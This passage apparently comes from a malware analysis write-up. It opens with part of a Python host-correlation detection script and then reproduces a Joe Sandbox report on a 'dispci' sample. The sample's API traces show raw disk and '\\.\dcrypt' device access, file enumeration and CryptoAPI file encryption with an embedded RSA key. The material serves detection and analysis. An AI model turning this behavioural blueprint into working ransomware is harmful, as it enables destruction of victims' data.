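def hosts_with_indicators(events, minimum=2):
    """Correlate per host: return hosts on which at least `minimum` distinct
    rules fired, each with the sorted list of rule names."""
    per_host = {}
    for ev in events:
        for name in match_event(ev):
            per_host.setdefault(ev["host"], set()).add(name)
    return {h: sorted(names) for h, names in per_host.items() if len(names) >= minimum}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], ev["kind"], match_event(ev))
    print(hosts_with_indicators(SAMPLE_EVENTS))
```

The correlation step matters more than any single rule: `schtasks /Delete` is routine administration, so a benign deletion on ws02 produces no alert, while ws01 shows all three stages from the same function family and is worth triage. Since the report only shows the deletion format string, the creation side of the task is not modelled here.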

                                              Control-flow Graph (blocks and edges; in the interactive report each block is marked executed or not executed)
                                              control_flow_graph 150 a83d00-a83d23 TlsGetValue 151 a83d4c-a83d66 DeviceIoControl 150->151 152 a83d25-a83d3c CreateFileW 150->152 153 a83d6e-a83d7b 151->153 155 a83d68 GetLastError 151->155 152->153 154 a83d3e-a83d46 TlsSetValue 152->154 156 a83d80-a83d85 153->156 154->151 155->153 156->156 157 a83d87-a83d90 156->157
                                              APIs
                                              • TlsGetValue.KERNEL32(?), ref: 00A83D19
                                              • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                              • DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                              • GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlCreateDeviceErrorFileLast
                                              • String ID: \\.\dcrypt
                                              • API String ID: 2163648868-1945893055
                                              • Opcode ID: bdca5c83754d58616d8c84cfddf14f384121ef17b6c3fe400bb4d0b90c17feb6
                                              • Instruction ID: cc15a10cc37f198efc8c4adbf6bcd2e75a85aab182eff3c3165bebb6c261f535
                                              • Opcode Fuzzy Hash: bdca5c83754d58616d8c84cfddf14f384121ef17b6c3fe400bb4d0b90c17feb6
                                              • Instruction Fuzzy Hash: 0E014077701210BFEE20EBDAAC49F673B7CE759B21F11050AFA05D72A0DA605E0287E1

                                              Control-flow Graph (blocks and edges; in the interactive report each block is marked executed or not executed)
                                              control_flow_graph 158 a821f0-a82208 159 a82210-a82225 158->159 159->159 160 a82227-a8225e TlsGetValue DeviceIoControl 159->160 161 a8228f 160->161 162 a82260-a82265 160->162 163 a82294-a822a2 call a85c9f 161->163 162->163 164 a82267-a8226f 162->164 165 a82271-a8227e 164->165 165->165 167 a82280-a8228e call a85c9f 165->167
                                              APIs
                                              • TlsGetValue.KERNEL32(?,00220040,?,00000298,?,00000298,?,00000000), ref: 00A8224F
                                              • DeviceIoControl.KERNELBASE(00000000), ref: 00A82256
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ControlDeviceValue
                                              • String ID:
                                              • API String ID: 4261377879-0
                                              • Opcode ID: ede095add9c6b2348f312264f5c1a65e90b19d38232eb9efd4e2d1077d6d81c3
                                              • Instruction ID: 93fc0ec7ba43a1f62172b25e7162f05a6a6c2e12b804207e0e62ce1700da4741
                                              • Opcode Fuzzy Hash: ede095add9c6b2348f312264f5c1a65e90b19d38232eb9efd4e2d1077d6d81c3
                                              • Instruction Fuzzy Hash: 2311AC31B002199BDB14EBB8D846BBA73B8EF49310F4005A9EC0A97280EE74AE05C750

                                              Control-flow Graph (blocks and edges; in the interactive report each block is marked executed or not executed)
                                              control_flow_graph 171 a87d0c-a87d1d call a87ce1 ExitProcess
                                              APIs
                                              • ___crtCorExitProcess.LIBCMT ref: 00A87D14
                                                • Part of subcall function 00A87CE1: GetModuleHandleW.KERNEL32(mscoree.dll,?,00A87D19,?,?,00A85EB5,000000FF,0000001E,00000001,00000000,00000000,?,00A8B13B,?,00000001,?), ref: 00A87CEB
                                                • Part of subcall function 00A87CE1: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A87CFB
                                              • ExitProcess.KERNEL32 ref: 00A87D1D
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                              • String ID:
                                              • API String ID: 2427264223-0
                                              • Opcode ID: fac0e1d54fb0d6d247fa2760fe8786e62d5f8c7c5aaf98c76a843c9698c08f61
                                              • Instruction ID: 50f9ece7008283788e54aa371bb85c53dcf68d4775789a1e3ada92e20a630653
                                              • Opcode Fuzzy Hash: fac0e1d54fb0d6d247fa2760fe8786e62d5f8c7c5aaf98c76a843c9698c08f61
                                              • Instruction Fuzzy Hash: DBB09232004108BBCF013F52DE0A84D3F2AEB803A0B614022F8180A031DF72EEA3AA80

                                              Control-flow Graph (blocks and edges; in the interactive report each block is marked executed or not executed)
                                              control_flow_graph 188 a84223-a8422a 189 a84230-a8424b 188->189 190 a8424d-a84252 call a83d00 189->190 191 a84257-a8425e 189->191 190->191 191->189 193 a84260-a8426b 191->193 195 a84270-a84275 193->195 195->195 196 a84277-a84283 EnumWindows call a83d00 195->196 198 a84288-a84296 call a85c9f 196->198
                                              APIs
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A8427D
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlCreateDeviceEnumErrorFileLastWindows
                                              • String ID:
                                              • API String ID: 1452533794-0
                                              • Opcode ID: 966b3795baccfca5ea195a23e89f7c7e22d6bc41bc0bc1ebced9dc9529f9d5b5
                                              • Instruction ID: 79e27f9f45170d2d0b55585a8e272fb94bb4c44715d1497d774abb586844c7b8
                                              • Opcode Fuzzy Hash: 966b3795baccfca5ea195a23e89f7c7e22d6bc41bc0bc1ebced9dc9529f9d5b5
                                              • Instruction Fuzzy Hash: C2F0E930B041098FDF15FFA0E9867E93770EB1D300F0104AEE8468B2A2EE201D468BD1

                                              Control-flow Graph (blocks and edges; in the interactive report each block is marked executed or not executed)
                                              control_flow_graph 201 a87f64-a87f70 call a87e24 203 a87f75-a87f79 201->203
                                              APIs
                                              • _doexit.LIBCMT ref: 00A87F70
                                                • Part of subcall function 00A87E24: __lock.LIBCMT ref: 00A87E32
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL(00A95CF0), ref: 00A87E6E
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL ref: 00A87E7F
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL(-00000004), ref: 00A87EA5
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL ref: 00A87EB8
                                                • Part of subcall function 00A87E24: RtlDecodePointer.NTDLL ref: 00A87EC2
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: DecodePointer$__lock_doexit
                                              • String ID:
                                              • API String ID: 3343572566-0
                                              • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                              • Instruction ID: f8496ef12f0e5019f8b65fbc66dad5ae5c8fd617e4762ad53e118ec6a9953830
                                              • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                              • Instruction Fuzzy Hash: FEB0923258420833DA202542AC03F0A3A4987C1B60E2400A0BA0C195A1A9A2AD618189
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • CloseHandle.KERNEL32 ref: 00A82A65
                                              • _free.LIBCMT ref: 00A82A6C
                                              • _free.LIBCMT ref: 00A82A7F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free$CloseCreateFileHandle__snwprintf_malloc
                                              • String ID: $@$EXEFILE
                                              • API String ID: 798375799-665770621
                                              • Opcode ID: 346071e2e13e291f44c16ca6607a9cca3e8607a024cf5e20502440dbe99fe6f7
                                              • Instruction ID: b11e9c0f5453b98eeb2420ed7c5db706c3f18605d48ec994868e54f0e8fbe9e5
                                              • Opcode Fuzzy Hash: 346071e2e13e291f44c16ca6607a9cca3e8607a024cf5e20502440dbe99fe6f7
                                              • Instruction Fuzzy Hash: 47E1D8B2F012149BDF34EF64CD84BBEB3B5EF84350F1941A9E919A7241D6709E82CB94
                                              APIs
                                              • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?), ref: 00A81A11
                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00A81A2E
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00A81A71
                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,?,00000000), ref: 00A81AB3
                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,?), ref: 00A81ACA
                                              • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00A81AE7
                                              • FlushViewOfFile.KERNEL32(00000000,?), ref: 00A81AF6
                                              • _wprintf.LIBCMT ref: 00A81B05
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00A81B0E
                                              • CloseHandle.KERNEL32(00000000), ref: 00A81B15
                                              • CloseHandle.KERNEL32(00000000), ref: 00A81B46
                                              • CryptDestroyKey.ADVAPI32(?), ref: 00A81B50
                                              • SetEvent.KERNEL32(?), ref: 00A81B6A
                                              • SetEvent.KERNEL32(?), ref: 00A81B74
                                                • Part of subcall function 00A81810: CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00A818D9
                                                • Part of subcall function 00A81810: CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00A818F3
                                                • Part of subcall function 00A81810: LocalAlloc.KERNEL32(00000040,?), ref: 00A8190A
                                                • Part of subcall function 00A81810: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A81927
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CryptFile$HashView$CloseCreateDuplicateEventHandle$AllocDataDecryptDestroyFlushLocalMappingParamSizeUnmap_wprintf
                                              • String ID: %lS OK
                                              • API String ID: 2843717376-683714924
                                              • Opcode ID: 4787e10ad020c9c50515fb5d5f58d1a8a843b7421451b836df357da919f23669
                                              • Instruction ID: 76e7dd796c4323bc4f4a386a52207280eb5d5e0a260b2438049e1b18519806f6
                                              • Opcode Fuzzy Hash: 4787e10ad020c9c50515fb5d5f58d1a8a843b7421451b836df357da919f23669
                                              • Instruction Fuzzy Hash: CC514476A00109BFDF10DFA4DC88ABEB77DFB48751F14411AF915A7250EB70AE428B60
                                              APIs
                                                • Part of subcall function 00A81710: GetFileSizeEx.KERNEL32(?,?), ref: 00A81723
                                                • Part of subcall function 00A81710: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00A81744
                                                • Part of subcall function 00A81710: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00A8175D
                                                • Part of subcall function 00A81710: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00A81779
                                              • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00A818D9
                                              • CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00A818F3
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A8190A
                                              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00A81927
                                              • LocalFree.KERNEL32(00000000), ref: 00A819AE
                                              • CryptDestroyHash.ADVAPI32(00000000), ref: 00A819B8
                                              • LocalFree.KERNEL32(?), ref: 00A819C2
                                              • LocalFree.KERNEL32(?), ref: 00A819DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Local$CryptHash$FileFree$Alloc$DataDestroyDuplicateParamPointerReadSize
                                              • String ID: encrypted
                                              • API String ID: 1377777459-1467498611
                                              • Opcode ID: a4530142f2b8188932a3d8a104310daab2fcc89430a410b643ee956a5126729e
                                              • Instruction ID: be384e2ab37e3aa317a3c0e3c35a3202038fabf8191c9057d228e92f1e3f74fe
                                              • Opcode Fuzzy Hash: a4530142f2b8188932a3d8a104310daab2fcc89430a410b643ee956a5126729e
                                              • Instruction Fuzzy Hash: 08512772F001119BDB24EF79C890A7DBFB9AF85300F1845A6EA85DB281DA31DE42CB50
                                              APIs
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00A81E4C
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00A81E77
                                              • GetLastError.KERNEL32 ref: 00A81E7D
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00A81E93
                                              • CryptDestroyHash.ADVAPI32(?), ref: 00A81ED6
                                              • CryptDestroyKey.ADVAPI32(?), ref: 00A81EE0
                                              • CryptDestroyKey.ADVAPI32 ref: 00A81EE9
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A81EF4
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00A81EFE
                                              • LocalFree.KERNEL32(?), ref: 00A81F18
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$ContextDestroy$Acquire$CloseCreateErrorEventFreeHandleHashLastLocalRelease
                                              • String ID:
                                              • API String ID: 1700672282-0
                                              • Opcode ID: 506f517ba31b91e44fb6a1afea9d792807722ddcceecf44b0093395afc9891f0
                                              • Instruction ID: 19a26dc61128fb0cccb2abb329a7cd92b2c627b2f1663ceeb2f5c204e258158c
                                              • Opcode Fuzzy Hash: 506f517ba31b91e44fb6a1afea9d792807722ddcceecf44b0093395afc9891f0
                                              • Instruction Fuzzy Hash: 71217C75340701ABEB20EBA59C85F6777BCAF48741F104419FA02D6591DF61E9028B64
                                              APIs
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A810A4
                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A810B4
                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A810D2
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,?), ref: 00A810F8
                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A81104
                                              • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 00A81122
                                              • CryptImportPublicKeyInfo.CRYPT32(00000000,00000001,00000000,?), ref: 00A81133
                                              • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A8113D
                                              • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A81144
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                              • String ID:
                                              • API String ID: 3940947887-0
                                              • Opcode ID: d907c4cf2c2f0f927c79ae1564d8f75003c64bb4c1681fc009221de9d7455cd6
                                              • Instruction ID: e92fd3a1ef10400480132e7aa7c70b3d3f3a29d83a44ea768c47158bc3477958
                                              • Opcode Fuzzy Hash: d907c4cf2c2f0f927c79ae1564d8f75003c64bb4c1681fc009221de9d7455cd6
                                              • Instruction Fuzzy Hash: 03216136B40215BBEB20DBD5DC89FEFBB7CEB45B50F104156FA04A6280DAB09E4187A4
                                              APIs
                                              • __snwprintf.LIBCMT ref: 00A83A0A
                                              • _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A85E86: __FF_MSGBANNER.LIBCMT ref: 00A85E9F
                                                • Part of subcall function 00A85E86: __NMSG_WRITE.LIBCMT ref: 00A85EA6
                                                • Part of subcall function 00A85E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1), ref: 00A85ECB
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                              • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00A83A6F
                                              • _free.LIBCMT ref: 00A83AD6
                                                • Part of subcall function 00A85E4C: HeapFree.KERNEL32(00000000,00000000,?,00A8A0A7,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1), ref: 00A85E62
                                                • Part of subcall function 00A85E4C: GetLastError.KERNEL32(00000000,?,00A8A0A7,00000000,?,00A8B13B,?,00000001,?,?,00A89441,00000018,00A95D10,0000000C,00A894D1,?), ref: 00A85E74
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Heap$AllocControlCreateDeviceErrorFileFreeLast__snwprintf_free_malloc
                                              • String ID: \\.\PhysicalDrive%d
                                              • API String ID: 2774441620-2935326385
                                              • Opcode ID: 240e48fa602aaa6338b1c56740e5fef8bca21e33127b0852a33cb3008d131ac2
                                              • Instruction ID: e8c52478663c4cc016e452d91a0f0c501de8587f5315a5f39b78301b1fd948e6
                                              • Opcode Fuzzy Hash: 240e48fa602aaa6338b1c56740e5fef8bca21e33127b0852a33cb3008d131ac2
                                              • Instruction Fuzzy Hash: 7531B871B416046BDB24EF64DC46FAAB7B4EB48B10F104599F50A972C0DB71AA418B50
                                              APIs
                                              • PathCombineW.SHLWAPI(?,?,00A95624), ref: 00A81BBF
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00A81BDA
                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00A81C07
                                              • PathCombineW.SHLWAPI(?,?,?), ref: 00A81CB1
                                              • PathFindExtensionW.SHLWAPI(?), ref: 00A81CF2
                                              • FindNextFileW.KERNEL32(?,?), ref: 00A81D3F
                                              • FindClose.KERNEL32(00000000), ref: 00A81D4E
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                              • String ID:
                                              • API String ID: 1251538951-0
                                              • Opcode ID: c28c4b2ec9ed9cff92e9ede846816792924ebb257fa44da79647d52cddaf08a4
                                              • Instruction ID: 968055b6ed06365e9111648b980192dedcd2dab68834c951eb3cc8350f321497
                                              • Opcode Fuzzy Hash: c28c4b2ec9ed9cff92e9ede846816792924ebb257fa44da79647d52cddaf08a4
                                              • Instruction Fuzzy Hash: CE51BCB26042019ADB20EF24CC45BEB73BDAFA5754F044A29E956861A4FB32DA07C791
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00A815C0
                                              • GetLastError.KERNEL32 ref: 00A815C6
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00A815DD
                                              • CryptDestroyKey.ADVAPI32(?), ref: 00A8162C
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A81638
                                              Strings
                                              • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00A815EB
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                               • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                               • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$Acquire$DestroyErrorLastRelease
                                              • String ID: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                              • API String ID: 970883721-4244860603
                                              • Opcode ID: 7adbcd5b12812eac4ed374b6b6598530d196c90b0c2cf0063d242f29ca4a2a4c
                                              • Instruction ID: f5da5d062737633bc07b0e0de5455e94e2ace0f4ee5317176963b4d0a1c8f2d2
                                              • Opcode Fuzzy Hash: 7adbcd5b12812eac4ed374b6b6598530d196c90b0c2cf0063d242f29ca4a2a4c
                                              • Instruction Fuzzy Hash: 81118172A00119BBCB10EBA99C44EDE7BBCEF84741F144165F909D7250EA309B068BA0
                                              APIs
                                              • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00A8101F
                                              • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00A8102D
